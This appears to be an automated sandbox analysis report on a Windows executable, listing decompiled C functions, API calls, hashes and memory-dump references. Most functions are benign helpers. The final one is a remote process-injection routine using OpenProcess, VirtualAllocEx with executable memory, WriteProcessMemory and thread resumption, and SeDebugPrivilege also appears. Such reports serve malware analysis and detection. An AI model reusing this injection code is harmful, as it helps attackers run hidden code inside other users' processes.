                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                                                0x004056b5
                                                                                                                0x004056c3
                                                                                                                0x004056c5
                                                                                                                0x004056cc
                                                                                                                0x004056cf
                                                                                                                0x004056d2
                                                                                                                0x004056d5
                                                                                                                0x004056dc
                                                                                                                0x004056df
                                                                                                                0x004056e2
                                                                                                                0x004056e5
                                                                                                                0x004056e8
                                                                                                                0x004056ef
                                                                                                                0x004056f2
                                                                                                                0x004056f7
                                                                                                                0x004056fd
                                                                                                                0x00405832
                                                                                                                0x00405832
                                                                                                                0x00405835
                                                                                                                0x00405835
                                                                                                                0x00405838
                                                                                                                0x0040583e
                                                                                                                0x00405849
                                                                                                                0x00405849
                                                                                                                0x00405703
                                                                                                                0x00405706
                                                                                                                0x00405709
                                                                                                                0x00405710
                                                                                                                0x0040575b
                                                                                                                0x00405766
                                                                                                                0x0040577b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040577d
                                                                                                                0x00000000
                                                                                                                0x0040577d
                                                                                                                0x0040576b
                                                                                                                0x0040576e
                                                                                                                0x00000000
                                                                                                                0x00405783
                                                                                                                0x00405783
                                                                                                                0x00405785
                                                                                                                0x004057d1
                                                                                                                0x004057dc
                                                                                                                0x004057e4
                                                                                                                0x004057e8
                                                                                                                0x004057eb
                                                                                                                0x004057ec
                                                                                                                0x004057ef
                                                                                                                0x004057ef
                                                                                                                0x00000000
                                                                                                                0x004057ef
                                                                                                                0x0040578b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405790
                                                                                                                0x00405796
                                                                                                                0x00405798
                                                                                                                0x0040579e
                                                                                                                0x004057a1
                                                                                                                0x004057b4
                                                                                                                0x004057a3
                                                                                                                0x004057a5
                                                                                                                0x004057a5
                                                                                                                0x004057ba
                                                                                                                0x004057c1
                                                                                                                0x004057c3
                                                                                                                0x004057c3
                                                                                                                0x004057c8
                                                                                                                0x004057cb
                                                                                                                0x004057cb
                                                                                                                0x004057ce
                                                                                                                0x00000000
                                                                                                                0x004057ce
                                                                                                                0x00405717
                                                                                                                0x0040571a
                                                                                                                0x00405725
                                                                                                                0x0040572a
                                                                                                                0x0040572f
                                                                                                                0x00405733
                                                                                                                0x00405735
                                                                                                                0x00405735
                                                                                                                0x0040573e
                                                                                                                0x00405743
                                                                                                                0x00405746
                                                                                                                0x0040574d
                                                                                                                0x00405750
                                                                                                                0x00405750
                                                                                                                0x0040571a
                                                                                                                0x004057f2
                                                                                                                0x004057f2
                                                                                                                0x004057f8
                                                                                                                0x004057fe
                                                                                                                0x004057fe
                                                                                                                0x00405809
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405810
                                                                                                                0x00405815
                                                                                                                0x0040581a
                                                                                                                0x0040581e
                                                                                                                0x00405820
                                                                                                                0x00405820
                                                                                                                0x00405825
                                                                                                                0x0040582b
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                  • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1294909896-123907689
                                                                                                                • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                0x004054bc
                                                                                                                0x004054c4
                                                                                                                0x004054cd
                                                                                                                0x004054cf
                                                                                                                0x004054d2
                                                                                                                0x004054d5
                                                                                                                0x004054d8
                                                                                                                0x004054db
                                                                                                                0x004054de

                                                                                                                APIs
                                                                                                                • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                0x00408f4c
                                                                                                                0x00408f57
                                                                                                                0x00408f60
                                                                                                                0x00408f62
                                                                                                                0x00408f67
                                                                                                                0x00408f67
                                                                                                                0x00408f71

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                0x004098fa
                                                                                                                0x004098fc
                                                                                                                0x00409901
                                                                                                                0x00409907
                                                                                                                0x00000000
                                                                                                                0x0040991c
                                                                                                                0x00409918
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                0x004095da
                                                                                                                0x004095da
                                                                                                                0x004095de
                                                                                                                0x004095e1
                                                                                                                0x004095e7
                                                                                                                0x004095e7
                                                                                                                0x004095ee
                                                                                                                0x004095fc

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                                0x004055d1
                                                                                                                0x004055d1
                                                                                                                0x004055d5
                                                                                                                0x004055da
                                                                                                                0x004055df
                                                                                                                0x004055e3
                                                                                                                0x004055e4
                                                                                                                0x004055e8
                                                                                                                0x004055eb

                                                                                                                APIs
                                                                                                                • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                0x0040a474
                                                                                                                0x0040a47b
                                                                                                                0x0040a48a
                                                                                                                0x0040a48d
                                                                                                                0x0040a48f
                                                                                                                0x0040a497
                                                                                                                0x0040a49a
                                                                                                                0x0040a6f7
                                                                                                                0x0040a6f9
                                                                                                                0x0040a700
                                                                                                                0x0040a700
                                                                                                                0x0040a4ad
                                                                                                                0x0040a4b3
                                                                                                                0x0040a4b8
                                                                                                                0x0040a4c6
                                                                                                                0x0040a4cc
                                                                                                                0x0040a4cf
                                                                                                                0x0040a4dd
                                                                                                                0x0040a4e2
                                                                                                                0x0040a4e3
                                                                                                                0x0040a4ea
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4ec
                                                                                                                0x0040a4f6
                                                                                                                0x0040a4fe
                                                                                                                0x0040a503
                                                                                                                0x0040a504
                                                                                                                0x0040a50b
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a50d
                                                                                                                0x0040a512
                                                                                                                0x0040a518
                                                                                                                0x0040a51c
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a528
                                                                                                                0x0040a537
                                                                                                                0x0040a54c
                                                                                                                0x0040a539
                                                                                                                0x0040a544
                                                                                                                0x0040a549
                                                                                                                0x0040a558
                                                                                                                0x0040a56d
                                                                                                                0x0040a55a
                                                                                                                0x0040a565
                                                                                                                0x0040a56a
                                                                                                                0x0040a579
                                                                                                                0x0040a591
                                                                                                                0x0040a57b
                                                                                                                0x0040a589
                                                                                                                0x0040a58e
                                                                                                                0x0040a5b4
                                                                                                                0x0040a5b7
                                                                                                                0x0040a5cc
                                                                                                                0x0040a5cf
                                                                                                                0x0040a5d4
                                                                                                                0x0040a5d7
                                                                                                                0x0040a6ed
                                                                                                                0x0040a5e5
                                                                                                                0x0040a5fa
                                                                                                                0x0040a60b
                                                                                                                0x0040a61a
                                                                                                                0x0040a620
                                                                                                                0x0040a623
                                                                                                                0x0040a62b
                                                                                                                0x0040a62f
                                                                                                                0x0040a632
                                                                                                                0x0040a659
                                                                                                                0x0040a634
                                                                                                                0x0040a635
                                                                                                                0x0040a641
                                                                                                                0x0040a648
                                                                                                                0x0040a648
                                                                                                                0x0040a668
                                                                                                                0x0040a66e
                                                                                                                0x0040a685
                                                                                                                0x0040a69e
                                                                                                                0x0040a6a8
                                                                                                                0x0040a6ad
                                                                                                                0x0040a6bd
                                                                                                                0x0040a6c5
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d0
                                                                                                                0x0040a6d1
                                                                                                                0x0040a6d2
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d7
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6d7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
